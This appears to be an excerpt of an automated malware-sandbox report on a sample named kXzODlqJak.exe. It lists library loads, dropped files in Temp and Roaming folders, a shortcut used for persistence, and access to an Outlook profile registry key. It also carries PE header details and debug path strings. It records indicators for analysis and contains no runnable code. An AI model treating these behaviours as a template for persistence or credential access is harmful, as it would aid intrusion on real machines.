Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeSection loaded: feclient.dllJump to behavior
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: starburn.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: qtcore4.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: qtgui4.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: qtnetwork4.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: qtxml4.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: pla.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: tdh.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: starburn.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: qtcore4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: qtgui4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: qtnetwork4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: qtxml4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: pla.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: tdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: starburn.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: qtcore4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: qtgui4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: qtnetwork4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: qtxml4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: pla.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: tdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\kXzODlqJak.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F11-9C73-11D3-B32E-00C04F990BB4}\InProcServer32Jump to behavior
Source: levtqufltbol.5.drLNK file: ..\..\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
Source: kXzODlqJak.exeStatic file information: File size 14323584 > 1048576
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeFile opened: C:\Windows\TEMP\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\msvcr100.dllJump to behavior
Source: kXzODlqJak.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: kXzODlqJak.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: kXzODlqJak.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: kXzODlqJak.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: kXzODlqJak.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: kXzODlqJak.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: kXzODlqJak.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: kXzODlqJak.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a\wix4\wix4\build\burn\Release\x86\burn.pdb source: kXzODlqJak.exe, 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000000.00000000.1464724380.000000000094E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000002.00000002.1794829664.0000000000F8E000.00000002.00000001.01000000.00000005.sdmp, kXzODlqJak.exe, 00000002.00000000.1471861576.0000000000F8E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RescueCDBurner.exe, 00000003.00000002.1525111531.000000000A850000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1524976626.000000000A4FE000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586229911.000000000A4E0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586508920.000000000A892000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586052674.000000000A18D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1852720442.00000000059D0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1849688078.0000000005105000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2803897561.000000000428C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RescueCDBurner.exe, 00000003.00000002.1525111531.000000000A850000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1524976626.000000000A4FE000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586229911.000000000A4E0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586508920.000000000A892000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586052674.000000000A18D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1852720442.00000000059D0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1849688078.0000000005105000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: D:\a\wix4\wix4\build\burn\Release\x86\burn.pdb> source: kXzODlqJak.exe, 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000000.00000000.1464724380.000000000094E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000002.00000002.1794829664.0000000000F8E000.00000002.00000001.01000000.00000005.sdmp, kXzODlqJak.exe, 00000002.00000000.1471861576.0000000000F8E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: R:\Codes\TXFTNActiveX\TXFTNActiveX\ReleaseUMinDependency\TXFTNActiveX.pdb 0 source: kXzODlqJak.exe, 00000002.00000002.1795877329.000000006D0C1000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: R:\Codes\TXFTNActiveX\TXFTNActiveX\ReleaseUMinDependency\TXFTNActiveX.pdb source: kXzODlqJak.exe, 00000002.00000002.1795877329.000000006D0C1000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local StateO source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2311847799.000000000050C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2278367535.000000000050C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A58314 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: msvcr100.i386.pdb source: RescueCDBurner.exe, RescueCDBurner.exe, 00000003.00000002.1525283070.000000006C0C1000.00000020.00000001.01000000.0000000E.sdmp, RescueCDBurner.exe, 00000004.00000002.1587284521.000000006B0A1000.00000020.00000001.01000000.00000017.sdmp
Source: Binary string: msvcp100.i386.pdb source: RescueCDBurner.exe, 00000003.00000002.1525430639.000000006C311000.00000020.00000001.01000000.0000000D.sdmp, RescueCDBurner.exe, 00000004.00000002.1587494313.000000006B161000.00000020.00000001.01000000.00000016.sdmp
